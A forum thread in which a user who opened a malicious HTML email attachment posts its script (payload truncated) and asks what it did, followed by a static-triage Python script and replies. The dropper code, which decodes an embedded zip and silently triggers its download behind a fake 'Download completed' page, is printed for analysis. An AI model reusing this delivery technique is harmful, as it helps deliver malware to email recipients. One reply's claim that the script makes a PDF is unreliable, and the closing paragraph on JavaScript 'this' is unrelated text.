Stupidly, I clicked on an email attachment with an html extension to see what the scam was. I think I was expecting it to open in a text editor, but it ran. (Dumb, dumb, dumb!) Anyway, I've paid my dues by restoring over a terabyte of backup onto two disks. My question is, can someone far more expert than I am in javascript interpret what the embedded script does, in general terms. (Not what the embedded malware does.) Before anyone panics, I've cut some 600,000 characters out of the text variable so it isn't a danger. (I've also changed the extension from html to txt.)

I think the text var in the script is a representation of the contents of a zip file, and the script changes the text to an actual file and saves it. I'm a bit unclear whether the script also tries to run the zipped file. I'd like to remove any lingering doubts as to anything bad that might have happened before I unplugged the ethernet cable. I never saw any evidence of a file being unzipped, or indeed of the zip file itself.

Any information on what the script was doing would be most welcome. Thanks!


It doesn't look like you've attached the file. Please attach it as a .txt file. (Other file formats might be rejected by our system).

Better yet, copy/paste the code into a code block.
I for one (and hopefully everyone) won't open attachments...

Jwenting,

If he attaches a txt file, our system will automatically display its contents inline in a safe way :)

OK, it looks like it doesn't like my attachment, even though it was a .txt file. The message that says it's not happy with the file only appears when I hover, and I thought the big "X" over my attachment was in case I wanted to delete it. Sorry. Here it is as an in-line block.

<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Document download</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>

<div>
    <h1>Download completed</h1>
    <p>The document was successfully downloaded.</p>
</div>


<script type="text/javascript">
var text = "645469 bytes deleted/   UEsBAh4AFAACAAgAXYbIVAne2AT+YwcAAAAgABwAEQAAAAAAAAAgAAAAAAAAAFNjYW5uZWREb2N1bWVudHNfOTcyMDQ4MS5pbWdTRAQArAAAAFVUBQAHQamgYlBLBQYAAAAAAQABAFsAAAC1ZAcAAAA=";

function b64toBlob (b64Data, contentType, sliceSize) {
  var byteArrays = [];
  var byteCharacters = atob(b64Data);

  for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
    var slice = byteCharacters.slice(offset, offset + sliceSize);

    var byteNumbers = new Array(slice.length);
    for (var i = 0; i < slice.length; i++) {
      byteNumbers[i] = slice.charCodeAt(i);
    }

    var byteArray = new Uint8Array(byteNumbers);
    byteArrays.push(byteArray);
  }

  var blob = new Blob(byteArrays, {type: contentType});
  return blob;
}

var blob = b64toBlob(text,'application/zip', 512);
if (window.navigator.msSaveOrOpenBlob) {
    window.navigator.msSaveOrOpenBlob(blob, "ScannedDocuments_9720481.zip");
} else {
    var url = URL.createObjectURL(blob);
    var a = document.createElement("a");
    a.href = url;
    a.download = "ScannedDocuments_9720481.zip";
    document.body.appendChild(a);
    a.click();
    setTimeout(function() {
        document.body.removeChild(a);
        window.URL.revokeObjectURL(url);
    },0);
}



</script>

</body>
</html>

Also I tried the hybrid analysis site, and if I understood the results correctly, it said it was malicious, but didn't say what it would do, what actions I might have observed, which is what I'm primarily concerned with. For instance, if it tried to open a zip file, the default for me would be win-zip and I would have seen it open, which I did not.
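For anyone triaging a page like the one above without running it: the only thing the visible script does is decode the base64 string into a Blob and hand it to the browser's download mechanism (msSaveOrOpenBlob on old IE/Edge, otherwise a synthetic click on an anchor with the download attribute). Nothing in it unzips, mounts or launches the file; the zip is just saved to the downloads folder, and the "Download completed" text is the lure. The script below is an added example (not from the post or any product) that does that triage statically in Python: it pulls the base64 literal out of the HTML, decodes it, and reads the ZIP directory records to list what the archive contains, without extracting anything. It is fed the tail fragment the poster left in the text variable (the rest was deleted), so it searches for central-directory records directly instead of trusting the end-of-central-directory offset; all names, the sample HTML wrapper and the "risky extension" list are this example's own choices.

```python
"""Static triage of an HTML 'download' dropper: extract the base64 payload,
decode it, and read the ZIP central directory without extracting anything."""
import base64
import json
import re
import struct

# Constructed sample: the tail of the base64 string left in the post above.
# A real sample would contain the full string (~650 KB here).
PAYLOAD_TAIL_B64 = ("UEsBAh4AFAACAAgAXYbIVAne2AT+YwcAAAAgABwAEQAAAAAAAAAgAAAAAAAAAFNj"
                    "YW5uZWREb2N1bWVudHNfOTcyMDQ4MS5pbWdTRAQArAAAAFVUBQAHQamgYlBLBQYA"
                    "AAAAAQABAFsAAAC1ZAcAAAA=")

# Minimal stand-in for the dropper page, wrapping only the fragment above.
SAMPLE_HTML = ('<script type="text/javascript">\nvar text = "' + PAYLOAD_TAIL_B64
               + '";\nvar blob = b64toBlob(text,\'application/zip\', 512);\n</script>')

CDIR_SIG = b"PK\x01\x02"   # central directory file header
EOCD_SIG = b"PK\x05\x06"   # end of central directory record
# Extensions that are executable or get mounted rather than opened (example list).
RISKY_EXTENSIONS = {"img", "iso", "vhd", "exe", "scr", "js", "vbs", "wsf",
                    "hta", "lnk", "bat", "cmd"}


def extract_b64_payload(html):
    """Return the longest base64 run inside the `var text = "..."` literal.
    Taking the longest run tolerates the poster's '... bytes deleted' note."""
    m = re.search(r'var\s+text\s*=\s*"([^"]*)"', html, re.S)
    if not m:
        return None
    runs = re.findall(r'[A-Za-z0-9+/]{16,}=?=?', m.group(1))
    return max(runs, key=len) if runs else None


def decode_b64(b64):
    """Decode base64, re-padding so a truncated fragment still decodes."""
    b64 = b64.rstrip("=")
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def read_eocd(data):
    """Parse the end-of-central-directory record (last 22+ bytes of a zip)."""
    pos = data.rfind(EOCD_SIG)
    if pos == -1 or pos + 22 > len(data):
        return None
    (_disk, _cd_disk, _n_here, n_total, cd_size, cd_offset,
     comment_len) = struct.unpack("<HHHHIIH", data[pos + 4:pos + 22])
    return {"entries": n_total, "cd_size": cd_size, "cd_offset": cd_offset,
            # Size the complete archive should have; compare with what we hold.
            "expected_archive_size": cd_offset + cd_size + 22 + comment_len}


def list_central_directory(data):
    """Describe every central-directory record found by signature scan, so a
    truncated payload (like the one in the post) can still be inspected."""
    entries = []
    pos = data.find(CDIR_SIG)
    while pos != -1 and pos + 46 <= len(data):
        (_made_by, _needed, flags, method, _mtime, _mdate, crc, csize, usize,
         nlen, xlen, clen, _disk, _iattr, _eattr,
         _local_off) = struct.unpack("<HHHHHHIIIHHHHHII", data[pos + 4:pos + 46])
        name = data[pos + 46:pos + 46 + nlen].decode("cp437", "replace")
        ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
        entries.append({
            "name": name,
            "method": method,                 # 0 = stored, 8 = deflate
            "compressed_size": csize,
            "uncompressed_size": usize,
            "crc32": crc,
            "encrypted": bool(flags & 1),     # general-purpose flag bit 0
            "risky_extension": ext in RISKY_EXTENSIONS,
        })
        pos = data.find(CDIR_SIG, pos + 46 + nlen + xlen + clen)
    return entries


def triage(html):
    """Full static report for one dropper page."""
    b64 = extract_b64_payload(html)
    if b64 is None:
        return {"error": "no base64 payload literal found"}
    data = decode_b64(b64)
    eocd = read_eocd(data)
    return {
        "decoded_bytes": len(data),
        "eocd": eocd,
        "entries": list_central_directory(data),
        "truncated": eocd is not None and eocd["expected_archive_size"] > len(data),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_HTML), indent=2))
```

Run against the fragment in the post, the report shows a single deflate-compressed entry named ScannedDocuments_9720481.img (a disk image inside the zip, a packaging attackers favour because a mounted image is opened rather than extracted), about 2 MiB uncompressed, and flags the archive as truncated because the directory says the complete file should be roughly 484 KB. That is all a defender can learn from the HTML itself; what the .img would have done is a separate sample analysis, and the dropper never gets that far on its own.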

Robert. Thank you. I'm not sure that it did anything. That's why I was asking for help in interpreting the javascript. I don't expect anyone to interpret the 600K file, which is probably an executable anyway, but I'd love to know if the javascript actually tried to "execute" the file it appears to be creating or if it just was hoping I would unzip it. I never saw anything besides the "Download completed" message. I never saw any sign of a zip file being unzipped. (I disconnected my PC from my network almost immediately and after a few days bit the bullet and restored my entire system from a backup prior to the incident. Possibly a bit over the top, but it let me get on with life.) My question here was intended to remove any last doubts.

Do you think the javascript would have actuated the malicious code, or just created it?

What little I could decode was it would create a PDF but that's as far as I got. It could do more but I don't have the 600K file and it's not work I do. I leave such to places like online scanners and r/Malware.

commented: Thanks for the additional info. I appreciate it. +2

In JavaScript, the this keyword refers to an object. Which object depends on how this is being invoked (used or called). The this keyword refers to different objects depending on how it is used: In an object method, this refers to the object.
